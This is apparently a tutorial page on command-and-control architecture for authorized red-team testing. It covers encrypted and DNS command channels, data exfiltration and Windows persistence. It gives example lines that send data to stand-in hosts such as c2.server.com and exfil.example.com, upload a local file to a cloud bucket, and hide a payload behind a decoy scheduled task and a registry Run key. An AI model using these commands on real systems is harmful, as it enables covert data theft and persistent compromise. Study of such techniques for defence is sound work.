Skip to content

C2 Architecture

The C2 (Command and Control) architecture is the backbone of offensive operations, enabling communication between attackers and compromised systems while maintaining stealth and persistence. A well-designed C2 infrastructure balances operational needs with evasion techniques to avoid detection. This section outlines the core components of a C2 architecture, including command channels, data exfiltration mechanisms, and persistence methods, with practical examples for authorized testing.


Command Channels

Command channels are the primary communication pathway between the C2 server and compromised hosts. They must balance stealth, reliability, and encryption to avoid detection. Common approaches include:

1. Encrypted Protocols

Modern C2s use HTTPS, TLS, or custom protocols to mask traffic. For example, a simple HTTP request to a C2 server might look like:

Invoke-WebRequest -Uri "https://c2.server.com/commands" -Method POST -Body "payload=base64_encoded_command"
This example uses HTTPS to blend with legitimate traffic, though real-world implementations often include additional obfuscation.

2. Alternative Protocols

DNS tunneling, ICMP, or even SMB can be used for stealth. For instance, DNS exfiltration might encode data in subdomain requests:

import socket
socket.gethostbyname("exfil.example.com")
This code could be modified to send data via DNS queries, leveraging the protocol's inherent anonymity.


Data Exfiltration Mechanisms

Data exfiltration is critical for extracting sensitive information from a network. Techniques vary based on the attacker's goals and environment:

1. Encrypted Channels

Data is often encrypted and split into chunks for transmission. A basic example using a custom protocol:

import socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("c2.server.com", 443))
sock.send(b"encrypted_data_chunk")
This example assumes a pre-established encrypted tunnel, which could be implemented with libraries like cryptography.

2. Leveraging Legitimate Services

Attackers may use cloud storage (e.g., AWS S3) or messaging platforms (e.g., Telegram) to exfiltrate data. For example, a script could upload files to a cloud bucket:

curl -X POST -H "Authorization: Bearer <token>" https://s3.amazonaws.com/bucket/exfil_data --data-binary @/path/to/file
This method relies on the target environment's access to such services.


Persistence Methods

Persistence ensures the C2 remains accessible after reboots or system changes. Common techniques include:

1. Scheduled Tasks

Creating a Windows task to launch the C2 payload:

Register-ScheduledTask -TaskName "SystemUpdate" -CommandLine "C:\malicious.exe" -Trigger AtStartup
This example uses a benign-sounding task name to avoid suspicion.

2. Registry Run Keys

Modifying the registry to execute the payload at login:

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"MaliciousApp"="C:\\malicious.exe"
This method is effective on Windows systems and leverages trusted system processes.

3. Kernel-Mode Persistence

Advanced techniques involve hooking system calls or modifying kernel modules, though these require deeper privileges and are less common in initial access scenarios.


Key takeaways

  • Command channels must balance stealth and reliability, often using encrypted protocols or alternative network protocols.
  • Data exfiltration relies on obfuscation, encryption, or leveraging legitimate services to avoid detection.
  • Persistence methods vary by platform, with scheduled tasks and registry keys being common for Windows environments.
  • Always test C2 components in isolated, authorized environments to ensure compliance with legal and ethical boundaries.